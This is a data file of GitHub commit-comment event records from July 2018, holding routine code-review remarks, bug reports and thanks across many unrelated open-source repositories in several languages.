{"id":"8023412800","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29845573,"position":4,"line":8,"path":"src/reducers/Reducer.js","commit_id":"19032aa8b9aaf54d2880a5eab9171e55013d3c01","created_at":"2018-07-26T15:17:43Z","updated_at":"2018-07-26T15:17:43Z","author_association":"COLLABORATOR","body":"We have to be very careful with arrays in our reducers.  Here, you are mutating the existing in-memory array directly rather than returning a brand new array.  This has many implications for how React does object comparison and decides whether or not to update the DOM.  Please read the articles [here](https://redux.js.org/recipes/structuring-reducers/prerequisite-concepts#immutable-data-management) and review [this](https://redux.js.org/recipes/structuring-reducers/immutable-update-patterns#inserting-and-removing-items-in-arrays).  Pure functions are a key concept that is vital to learn and understand."}},"created_at":"2018-07-26T15:17:43Z"}
{"id":"8023407883","type":"CommitCommentEvent","actor":{"login":"chanjsq"},"repo":{"name":"chanjsq/startup-scripts"},"payload":{"comment":{"id":29845559,"position":null,"line":null,"path":null,"commit_id":"57566aeea1aa434be5b4f4f2a062cf5233340cd4","created_at":"2018-07-26T15:16:59Z","updated_at":"2018-07-26T15:16:59Z","author_association":"OWNER","body":"Too many resources to add. List useful articles / acknowledgments later."}},"created_at":"2018-07-26T15:16:59Z"}
{"id":"8023418112","type":"CommitCommentEvent","actor":{"login":"VojtechVitek"},"repo":{"name":"pressly/lg"},"payload":{"comment":{"id":29845583,"position":4,"line":55,"path":"_example/main.go","commit_id":"83c229277c6898fda2f651b60e3220b312619ae8","created_at":"2018-07-26T15:18:34Z","updated_at":"2018-07-26T15:18:34Z","author_association":"MEMBER","body":"Aaah, vgo made me use old chi. That's why.\r\n\r\nFixed in bfbc64b4561fef198c68289c2610ccc4696d57d1\r\n\r\nThanks!"}},"created_at":"2018-07-26T15:18:34Z"}
{"id":"8023422634","type":"CommitCommentEvent","actor":{"login":"cproc"},"repo":{"name":"cproc/genode"},"payload":{"comment":{"id":29845590,"position":null,"line":null,"path":null,"commit_id":"c372c7fcfc3692771a2c3825c10f4d37db857637","created_at":"2018-07-26T15:19:16Z","updated_at":"2018-07-26T15:19:16Z","author_association":"OWNER","body":"@cnuke: please add to staging"}},"created_at":"2018-07-26T15:19:16Z"}
{"id":"8023422917","type":"CommitCommentEvent","actor":{"login":"Rnen"},"repo":{"name":"Grover-c13/Smod2"},"payload":{"comment":{"id":29845592,"position":null,"line":null,"path":null,"commit_id":"fbe191d3e6a5d79b8f09bdb3d5ecb72303439952","created_at":"2018-07-26T15:19:19Z","updated_at":"2018-07-26T15:19:19Z","author_association":"NONE","body":"I was guessing on the time it takes to re-animate someone, since that time may vary with 049's hp \r\n@KarlOfDuty "}},"created_at":"2018-07-26T15:19:19Z"}
{"id":"8023431502","type":"CommitCommentEvent","actor":{"login":"goto1134"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29845608,"position":22,"line":53,"path":"java/java-impl/src/com/intellij/codeInsight/daemon/impl/quickfix/ConvertSwitchToIfIntention.java","commit_id":"a3805fbf38b2725ef91503aa5f53ecee44d74526","created_at":"2018-07-26T15:20:40Z","updated_at":"2018-07-26T15:20:40Z","author_association":"CONTRIBUTOR","body":"@BasLeijdekkers throws clause is missing here. Is it ok?"}},"created_at":"2018-07-26T15:20:40Z"}
{"id":"8023431564","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845609,"position":23,"line":23,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:20:40Z","updated_at":"2018-07-26T15:20:40Z","author_association":"NONE","body":"Да, задержка с использованием системного таймера кажется логичным решением. Но увы, не является самым надежным. Одна из основных проблем -- что делать, если где-то еще потребовалась задержка? Во встроенных системах часто сочиняют кастомные функции задержки, основываясь на знаниях платформы. К примеру, конкретно для связки STM32 и GCC можно сделать приблизительно такие функции задержки, основываясь на полученном после компиляции ассемблере: \r\n``` c\r\nvoid delay_us(uint64_t us)\r\n{\r\n    us = us * multiplier - 10;\r\n    /* 4 cycles for one loop */\r\n    while (us--);\r\n}\r\n```\r\nПолезное чтиво: [stm32f4-discovery.net](https://stm32f4-discovery.net/2014/09/precise-delay-counter/)"}},"created_at":"2018-07-26T15:20:40Z"}
{"id":"8023414757","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"TechFortress/PopulationDensity"},"payload":{"comment":{"id":29845578,"position":null,"line":null,"path":null,"commit_id":"128baeb821cc51a3205b51bb0390b0bb5858af7b","created_at":"2018-07-26T15:18:01Z","updated_at":"2018-07-26T15:18:01Z","author_association":"MEMBER","body":"Hoppers fixed as per #43 not 45"}},"created_at":"2018-07-26T15:18:01Z"}
{"id":"8023440424","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29845623,"position":null,"line":null,"path":null,"commit_id":"ffab63090bfbaed33aee6110eb6ca39ecadf78a3","created_at":"2018-07-26T15:22:02Z","updated_at":"2018-07-26T15:22:02Z","author_association":"COLLABORATOR","body":"I did this based on the list only having two items, which for multiplication make sense now . \r\nhttps://github.com/JacquesCarette/Drasil/blob/07f2dc1ab89cb31b66ef59cd351b0d0e110d92f4/code/drasil-lang/Language/Drasil/Expr.hs#L90-L102\r\nI noticed that addition is more functional than multiplication. Are these instances good enough? If these need improvements, the printer matching may have problems. @JacquesCarette "}},"created_at":"2018-07-26T15:22:02Z"}
{"id":"8023440976","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845628,"position":22,"line":22,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:22:08Z","updated_at":"2018-07-26T15:22:08Z","author_association":"OWNER","body":"千万不要写成generator，除非你真的只想遍历一次"}},"created_at":"2018-07-26T15:22:08Z"}
{"id":"8023410212","type":"CommitCommentEvent","actor":{"login":"weritos666"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29845566,"position":null,"line":null,"path":null,"commit_id":"10c192abfa0cf773c13444df292373e8a8d0cb81","created_at":"2018-07-26T15:17:19Z","updated_at":"2018-07-26T15:17:19Z","author_association":"NONE","body":"Hello\r\nThe front camera really works\r\nBut now it's not possible to take a flash photo without XDR +\r\nA critical camera error occurs."}},"created_at":"2018-07-26T15:17:19Z"}
{"id":"8023442054","type":"CommitCommentEvent","actor":{"login":"martin-cs"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29845633,"position":45,"line":324,"path":"src/analyses/ai.h","commit_id":"7ab2670f070fe8627e08a2d0218c7c68220eeae1","created_at":"2018-07-26T15:22:16Z","updated_at":"2018-07-26T15:22:16Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-26T15:22:16Z"}
{"id":"8023436064","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845613,"position":4,"line":4,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:21:22Z","updated_at":"2018-07-26T15:21:22Z","author_association":"OWNER","body":"这个还是比较绕的，主要是反三角函数的性质，还要考虑后续弯矩轴力的正负号"}},"created_at":"2018-07-26T15:21:22Z"}
{"id":"8023444512","type":"CommitCommentEvent","actor":{"login":"erip"},"repo":{"name":"lagom/lagom"},"payload":{"comment":{"id":29845644,"position":null,"line":null,"path":null,"commit_id":"e3e8f08c76717ca6afd94c57fa34facc3823105a","created_at":"2018-07-26T15:22:40Z","updated_at":"2018-07-26T15:22:40Z","author_association":"CONTRIBUTOR","body":"🙈 "}},"created_at":"2018-07-26T15:22:40Z"}
{"id":"8023444833","type":"CommitCommentEvent","actor":{"login":"jcranky"},"repo":{"name":"jcranky/scala99"},"payload":{"comment":{"id":29845645,"position":26,"line":26,"path":"src/main/scala/com/jcranky/scala99/problem-13.scala","commit_id":"e062665acd7ec8e235c626765bb689112635f7a8","created_at":"2018-07-26T15:22:43Z","updated_at":"2018-07-26T15:22:43Z","author_association":"OWNER","body":"thanks for the comment :)"}},"created_at":"2018-07-26T15:22:43Z"}
{"id":"8023446370","type":"CommitCommentEvent","actor":{"login":"albertywu"},"repo":{"name":"xybotsu/pybot"},"payload":{"comment":{"id":29845648,"position":null,"line":null,"path":null,"commit_id":"a80d1e94bf398763a1393c3e73c7ae11f6079e6d","created_at":"2018-07-26T15:22:57Z","updated_at":"2018-07-26T15:22:57Z","author_association":"CONTRIBUTOR","body":":) nice work!"}},"created_at":"2018-07-26T15:22:57Z"}
{"id":"8023449013","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845656,"position":104,"line":104,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:23:24Z","updated_at":"2018-07-26T15:23:24Z","author_association":"OWNER","body":"生成传给下一级的轴力和弯矩，主要是弯矩"}},"created_at":"2018-07-26T15:23:24Z"}
{"id":"8023454963","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845668,"position":110,"line":110,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:24:19Z","updated_at":"2018-07-26T15:24:19Z","author_association":"OWNER","body":"来来来，核心算法了解一下。钢管结构能避免做复杂的微积分，或者是离散化。"}},"created_at":"2018-07-26T15:24:19Z"}
{"id":"8023457791","type":"CommitCommentEvent","actor":{"login":"ericfranz"},"repo":{"name":"OSC/ood-dashboard"},"payload":{"comment":{"id":29845671,"position":1,"line":1,"path":"app/apps/fav_path.rb","commit_id":"73b0bddddf4247e423da9b995164f85467b53e99","created_at":"2018-07-26T15:24:46Z","updated_at":"2018-07-26T15:24:46Z","author_association":"CONTRIBUTOR","body":"Rename it to the full \"FavoritePath\". Instead of overriding the initializer and using super, add a constructor class method like `build`\r\n\r\ndef self.build(title: nil)\r\n  path = FavoritePath.new\r\n  @title = title\r\nend"}},"created_at":"2018-07-26T15:24:46Z"}
{"id":"8023457985","type":"CommitCommentEvent","actor":{"login":"zarthcode"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":29845673,"position":null,"line":null,"path":null,"commit_id":"444725ae9a669c2ab87500346be147802b6a6f20","created_at":"2018-07-26T15:24:48Z","updated_at":"2018-07-26T15:24:48Z","author_association":"NONE","body":"I'm willing to bet the person just wasn't using SD, so it was convenient."}},"created_at":"2018-07-26T15:24:48Z"}
{"id":"8023459736","type":"CommitCommentEvent","actor":{"login":"ztlpn"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":29845677,"position":null,"line":null,"path":null,"commit_id":"ec202a7fd0531af8850e307951b97f4642ec1c86","created_at":"2018-07-26T15:25:04Z","updated_at":"2018-07-26T15:25:04Z","author_association":"CONTRIBUTOR","body":"What do you mean \"reset back\"? Who sets it?"}},"created_at":"2018-07-26T15:25:04Z"}
{"id":"8023460658","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845679,"position":119,"line":119,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:25:13Z","updated_at":"2018-07-26T15:25:13Z","author_association":"OWNER","body":"把截面参数和材料参数整合到一起，用于应力比检查和应变能计算"}},"created_at":"2018-07-26T15:25:13Z"}
{"id":"8023488223","type":"CommitCommentEvent","actor":{"login":"aaylward"},"repo":{"name":"aaylward/chunkingthing"},"payload":{"comment":{"id":29845742,"position":12,"line":12,"path":"src/main/java/com/andy/tasks/TaskProcessor.java","commit_id":"e03eee8710790344aa9bd4490be504dc448811c5","created_at":"2018-07-26T15:29:31Z","updated_at":"2018-07-26T15:29:31Z","author_association":"OWNER","body":"this class is more `Task` than `TaskProcessor`"}},"created_at":"2018-07-26T15:29:31Z"}
{"id":"8023489009","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845743,"position":171,"line":171,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:29:38Z","updated_at":"2018-07-26T15:29:38Z","author_association":"OWNER","body":"各级分别制定不同的钢管，演算应力比，计算应变能"}},"created_at":"2018-07-26T15:29:38Z"}
{"id":"8023491773","type":"CommitCommentEvent","actor":{"login":"bozis92"},"repo":{"name":"RH1CK/CubePlay"},"payload":{"comment":{"id":29845756,"position":null,"line":null,"path":null,"commit_id":"9017a6501f6bf4b77912ea60b1585372b26a969d","created_at":"2018-07-26T15:30:05Z","updated_at":"2018-07-26T15:30:05Z","author_association":"NONE","body":"redecanais funcionou mas ja parou "}},"created_at":"2018-07-26T15:30:05Z"}
{"id":"8023493707","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845760,"position":185,"line":185,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:30:22Z","updated_at":"2018-07-26T15:30:22Z","author_association":"OWNER","body":"最后得到的最合理布置的数据"}},"created_at":"2018-07-26T15:30:22Z"}
{"id":"8023493919","type":"CommitCommentEvent","actor":{"login":"jponroy"},"repo":{"name":"15knots/cmake4eclipse"},"payload":{"comment":{"id":29845761,"position":null,"line":null,"path":null,"commit_id":"6a58f46600b8fb10cea5fa5b726d70509d3e6da5","created_at":"2018-07-26T15:30:24Z","updated_at":"2018-07-26T15:30:24Z","author_association":"NONE","body":"I tested your fix and i still have duplicate entries. The issue is here :\r\n\r\n```\r\ndiff --git a/de.marw.cmake/src/main/java/de/marw/cmake/cdt/language/settings/providers/CompileCommandsJsonParser.java b/de.marw.cmake/src/main/java/de/marw/cmake/cdt/language/settings/providers/CompileCommandsJsonParser.java\r\nindex e59fc6b..c495c6e 100644\r\n--- a/de.marw.cmake/src/main/java/de/marw/cmake/cdt/language/settings/providers/CompileCommandsJsonParser.java\r\n+++ b/de.marw.cmake/src/main/java/de/marw/cmake/cdt/language/settings/providers/CompileCommandsJsonParser.java\r\n@@ -491,7 +491,7 @@\r\n     // add new items only, maintain list order\r\n     if (oldEntries != null) {\r\n       HashSet<ICLanguageSettingEntry> oldSet = new HashSet<>(oldEntries);\r\n-      oldEntries = new ArrayList<>(oldEntries); // as modifiable list\r\n+      oldEntries = new ArrayList<>(); // as modifiable list\r\n       for (ICLanguageSettingEntry e : allEntries) {\r\n         if (!oldSet.contains(e))\r\n           oldEntries.add(e);\r\n\r\n\r\n```"}},"created_at":"2018-07-26T15:30:24Z"}
{"id":"8023495139","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29845766,"position":187,"line":187,"path":"4-2-1.py","commit_id":"36ad4dd349f3d5339ef96d65db06fedce78a9486","created_at":"2018-07-26T15:30:36Z","updated_at":"2018-07-26T15:30:36Z","author_association":"OWNER","body":"数据可视化"}},"created_at":"2018-07-26T15:30:36Z"}
{"id":"8023496398","type":"CommitCommentEvent","actor":{"login":"ghlian"},"repo":{"name":"kkanagal/MSE448Project"},"payload":{"comment":{"id":29845768,"position":null,"line":null,"path":null,"commit_id":"004054ce5dc7f28fa69817a381f0f4806f0c1541","created_at":"2018-07-26T15:30:48Z","updated_at":"2018-07-26T15:30:48Z","author_association":"NONE","body":"Importing simulator error\r\nthe simulator is missing. What is the package?\r\n\r\n "}},"created_at":"2018-07-26T15:30:48Z"}
{"id":"8023501827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29845786,"position":null,"line":null,"path":null,"commit_id":"bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e","created_at":"2018-07-26T15:31:42Z","updated_at":"2018-07-26T15:31:42Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2323 of 2323 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf1e27e2cb2daa10d07460cb1447ed8ce2761c2e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T15:31:42Z"}
{"id":"8023511937","type":"CommitCommentEvent","actor":{"login":"SteHiggins"},"repo":{"name":"SteHiggins/CarouselView"},"payload":{"comment":{"id":29845802,"position":null,"line":null,"path":null,"commit_id":"83e8fa97dae483e04a815dcccf3677536d0c4c02","created_at":"2018-07-26T15:33:21Z","updated_at":"2018-07-26T15:33:21Z","author_association":"OWNER","body":"This commit was done for a project that is coming to a close.  We are using the Carousel View with an ItemsSource which is a collection of View Models.  We noticed that this caused a memory leak which resulted in a crash on older devices. This commit allows View Models to be used as ItemsSource"}},"created_at":"2018-07-26T15:33:21Z"}
{"id":"8023514470","type":"CommitCommentEvent","actor":{"login":"MatthiasHinz"},"repo":{"name":"RalfBill/learn.opengeoedu.de"},"payload":{"comment":{"id":29845812,"position":6,"line":5,"path":"pages/02.openx/01.vorlesung/08.opengedoata/docs.md","commit_id":"f67f1317614a6a6cc8592513d5e7261ee46260ac","created_at":"2018-07-26T15:33:45Z","updated_at":"2018-07-26T15:33:45Z","author_association":"NONE","body":"Wichtig: bitte die Hierarchie der Argumente beachten. Zulässig ist entweder\r\n\r\n```\r\ntaxonomy:\r\n    category: docs\r\n```\r\n\r\noder\r\n\r\n```\r\ntaxonomy:\r\n    category: \r\n          - docs\r\n\r\n```\r\n\r\nInvalide Argumente führen zu Fehlermeldungen beim Aufruf von GRAV \r\n\r\n![grafik](https://user-images.githubusercontent.com/2893162/43272336-078098ba-90fa-11e8-8b5b-cdf239aeb38b.png)\r\n\r\n"}},"created_at":"2018-07-26T15:33:45Z"}
{"id":"8023518032","type":"CommitCommentEvent","actor":{"login":"Sphar-io"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29845817,"position":51,"line":51,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-26T15:34:19Z","updated_at":"2018-07-26T15:34:19Z","author_association":"OWNER","body":"the return value is required for each lambda"}},"created_at":"2018-07-26T15:34:19Z"}
{"id":"8023519361","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29845822,"position":39,"line":1419,"path":"index.html","commit_id":"9cb4cadeae1975c957875edeb93754d296f3d0c8","created_at":"2018-07-26T15:34:32Z","updated_at":"2018-07-26T15:34:32Z","author_association":"NONE","body":"maybe the following set of examples would be better(?)\r\nMATCH\r\nrésumé\r\nRÉSUMÉ\r\nRésumé\r\n\r\nDON'T MATCH\r\nrésume&#x301;\r\nrésumé\r\n"}},"created_at":"2018-07-26T15:34:32Z"}
{"id":"8023522752","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845825,"position":40,"line":40,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:35:05Z","updated_at":"2018-07-26T15:35:05Z","author_association":"NONE","body":"Не самое лучшее решение в данной ситуации, главным образом со стороны читаемости. Обычно то, что сидит в сторонних библиотеках не дают переопределять пользователю за редким исключением. Возможно, более правильным решением будет передача в библиотеку указателя на пользовательский буффер. Да, мы не сэкономим 4 байта, но зато получим куда более понятный код. "}},"created_at":"2018-07-26T15:35:05Z"}
{"id":"8023524814","type":"CommitCommentEvent","actor":{"login":"Sphar-io"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29845831,"position":63,"line":63,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-26T15:35:25Z","updated_at":"2018-07-26T15:35:25Z","author_association":"OWNER","body":"the override `getParticipants()` in IOUState must return a `List<AbstractParty>` , so this mapping is necessary"}},"created_at":"2018-07-26T15:35:25Z"}
{"id":"8023524891","type":"CommitCommentEvent","actor":{"login":"kyptit94"},"repo":{"name":"kyptit94/kyptit94.github.io"},"payload":{"comment":{"id":29845833,"position":null,"line":null,"path":null,"commit_id":"7665d66ff97a88ea22990ec57770099f18606c14","created_at":"2018-07-26T15:35:26Z","updated_at":"2018-07-26T15:35:26Z","author_association":"OWNER","body":"m"}},"created_at":"2018-07-26T15:35:26Z"}
{"id":"8023525084","type":"CommitCommentEvent","actor":{"login":"hhdang6637"},"repo":{"name":"hhdang6637/embedded_linux_skeleton"},"payload":{"comment":{"id":29845835,"position":37,"line":70,"path":"applications/system_manager/firmwareManager.cpp","commit_id":"27fcf91934a2a0c60cc4c89b31a7d0b65331c8c6","created_at":"2018-07-26T15:35:28Z","updated_at":"2018-07-26T15:35:28Z","author_association":"OWNER","body":"I don't see you close ifd"}},"created_at":"2018-07-26T15:35:28Z"}
{"id":"8023527261","type":"CommitCommentEvent","actor":{"login":"sidbalu7"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29845837,"position":null,"line":null,"path":null,"commit_id":"21bf89fae01ec31bdb7de21e0315af7b06e95218","created_at":"2018-07-26T15:35:49Z","updated_at":"2018-07-26T15:35:49Z","author_association":"NONE","body":"I understand your point I am okay to reveal to customers that they can find their hostnames in SG gateway UI \r\nAnd not wanting to reveal bunch of important hostnames in the public document "}},"created_at":"2018-07-26T15:35:49Z"}
{"id":"8023527501","type":"CommitCommentEvent","actor":{"login":"tonyreina"},"repo":{"name":"rhc54/ompi"},"payload":{"comment":{"id":29845838,"position":null,"line":null,"path":null,"commit_id":"1fcda6f7a7416ebb5419a09c036c4b44dcea94e4","created_at":"2018-07-26T15:35:52Z","updated_at":"2018-07-26T15:35:52Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-26T15:35:52Z"}
{"id":"8023529494","type":"CommitCommentEvent","actor":{"login":"FraGag"},"repo":{"name":"sonicretro/sa_tools"},"payload":{"comment":{"id":29845841,"position":16,"line":73,"path":"SALVL/MainForm.cs","commit_id":"42cab37646bbf8b52cfdd5221b807e31fc4e491d","created_at":"2018-07-26T15:36:10Z","updated_at":"2018-07-26T15:36:10Z","author_association":"MEMBER","body":"Well my point is that `d3ddevice.Dispose();` should just be wrapped in `if (disposing) { ... }` to be absolutely correct. If you're not already familiar with it, I suggest you read up on the [Dispose pattern](https://docs.microsoft.com/en-us/dotnet/standard/design-guidelines/dispose-pattern). Perhaps that'll make my argument clearer. In particular, keep in mind that `MainForm::Dispose(bool)` might get called twice: once as `Dispose(true)` when `Dispose()` is called (`Application.Run(Form)` does this automatically) and once as `Dispose(false)` when `Finalize()` is called by the GC. If the `MainForm` wasn't disposed properly, then the attempt to `Dispose` the `Device` during `MainForm`'s `Finalize` might be futile because either the `Device` will be finalized first (leading to the same crash), or the `MainForm` will be finalized first (and `d3ddevice.Dispose()` might crash again for the same reason)."}},"created_at":"2018-07-26T15:36:10Z"}
{"id":"8023529824","type":"CommitCommentEvent","actor":{"login":"kyptit94"},"repo":{"name":"kyptit94/kyptit94.github.io"},"payload":{"comment":{"id":29845842,"position":null,"line":null,"path":null,"commit_id":"7665d66ff97a88ea22990ec57770099f18606c14","created_at":"2018-07-26T15:36:14Z","updated_at":"2018-07-26T15:36:14Z","author_association":"OWNER","body":"m"}},"created_at":"2018-07-26T15:36:14Z"}
{"id":"8023532147","type":"CommitCommentEvent","actor":{"login":"rbohl"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29845845,"position":36,"line":11,"path":"discover/portal/articles/210-setting-up/02-instance-settings/01-virtual-instances.markdown","commit_id":"636625c3ea93a6a6e143030185a0277280aef7a6","created_at":"2018-07-26T15:36:36Z","updated_at":"2018-07-26T15:36:36Z","author_association":"OWNER","body":"https://github.com/rbohl/liferay-docs/pull/80/commits/2678acffdf0415e48eef64500cd31eb1662f5630\r\n\r\nThe list that follows is supposed to be the more specific part. See my edits in the linked commit and let me know if we're getting closer :)"}},"created_at":"2018-07-26T15:36:36Z"}
{"id":"8023533204","type":"CommitCommentEvent","actor":{"login":"diegopradogesto"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29845850,"position":null,"line":null,"path":null,"commit_id":"9637207e2ea3c1dbd17e6251a6a31291b044e4f8","created_at":"2018-07-26T15:36:46Z","updated_at":"2018-07-26T15:36:46Z","author_association":"CONTRIBUTOR","body":"Should now delete the duplicated items in bundled_packages.json in Cura?: Cura/resources/bundled_packages.json"}},"created_at":"2018-07-26T15:36:46Z"}
{"id":"8023535334","type":"CommitCommentEvent","actor":{"login":"CodingMeansCreating"},"repo":{"name":"CodingMeansCreating/Learncpp.com"},"payload":{"comment":{"id":29845859,"position":null,"line":null,"path":null,"commit_id":"5dd763652efa5bacd08b38a1bcb8314ab20445e5","created_at":"2018-07-26T15:37:06Z","updated_at":"2018-07-26T15:37:06Z","author_association":"OWNER","body":"Creating a descending order array sorter "}},"created_at":"2018-07-26T15:37:06Z"}
{"id":"8023537983","type":"CommitCommentEvent","actor":{"login":"Nikolavna"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29845868,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T15:37:30Z","updated_at":"2018-07-26T15:37:30Z","author_association":"NONE","body":"A good project. I'm glad that I'm here."}},"created_at":"2018-07-26T15:37:30Z"}
{"id":"8023539698","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29845875,"position":null,"line":null,"path":null,"commit_id":"7577b003fad4bea74f0fbc0acfb888703c214323","created_at":"2018-07-26T15:37:47Z","updated_at":"2018-07-26T15:37:47Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-26T15:37:47Z"}
{"id":"8023541201","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":29845878,"position":56,"line":247,"path":"sklearn/decomposition/dict_learning.py","commit_id":"a52053deefb00fd15a4d9027fcddcad79bc5d83c","created_at":"2018-07-26T15:38:00Z","updated_at":"2018-07-26T15:38:00Z","author_association":"CONTRIBUTOR","body":"Good point. Raised as issue ( https://github.com/scikit-learn/scikit-learn/issues/11688 )."}},"created_at":"2018-07-26T15:38:00Z"}
{"id":"8023545411","type":"CommitCommentEvent","actor":{"login":"Coder0418"},"repo":{"name":"Lighthouse-Team/StudentManagement"},"payload":{"comment":{"id":29845895,"position":null,"line":null,"path":null,"commit_id":"728adb2cb7953f29d3bc173467cd50f869fb5559","created_at":"2018-07-26T15:38:40Z","updated_at":"2018-07-26T15:38:40Z","author_association":"CONTRIBUTOR","body":"aaa"}},"created_at":"2018-07-26T15:38:40Z"}
{"id":"8023546202","type":"CommitCommentEvent","actor":{"login":"diegopradogesto"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29845897,"position":14,"line":66,"path":"UM/PackageManager.py","commit_id":"9637207e2ea3c1dbd17e6251a6a31291b044e4f8","created_at":"2018-07-26T15:38:47Z","updated_at":"2018-07-26T15:38:47Z","author_association":"CONTRIBUTOR","body":"This seems like duplicated code if we look at line 38. Is this needed?"}},"created_at":"2018-07-26T15:38:47Z"}
{"id":"8023547169","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29845898,"position":null,"line":null,"path":null,"commit_id":"273cb44ebc2b732e4be6047fb22bfd4a56aa4fb5","created_at":"2018-07-26T15:38:56Z","updated_at":"2018-07-26T15:38:56Z","author_association":"NONE","body":"This was at 1.31 at LTC when the test was stopped. Should it be continued?\r\nhttp://tests.stockfishchess.org/tests/view/5b58db500ebc5902bdb892f1"}},"created_at":"2018-07-26T15:38:56Z"}
{"id":"8023553920","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29845905,"position":null,"line":null,"path":null,"commit_id":"3fc97e435328de064b65c2cb33c2a20ab16b5a1e","created_at":"2018-07-26T15:40:01Z","updated_at":"2018-07-26T15:40:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [linreg_ols_qr](https://trello.com/c/rgZ2gTSH/67-linregolsqr)"}},"created_at":"2018-07-26T15:40:01Z"}
{"id":"8023554309","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845907,"position":4,"line":4,"path":"STM32F4/mp45dt02.h","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:40:05Z","updated_at":"2018-07-26T15:40:05Z","author_association":"NONE","body":"Нет файла в репозитории. "}},"created_at":"2018-07-26T15:40:05Z"}
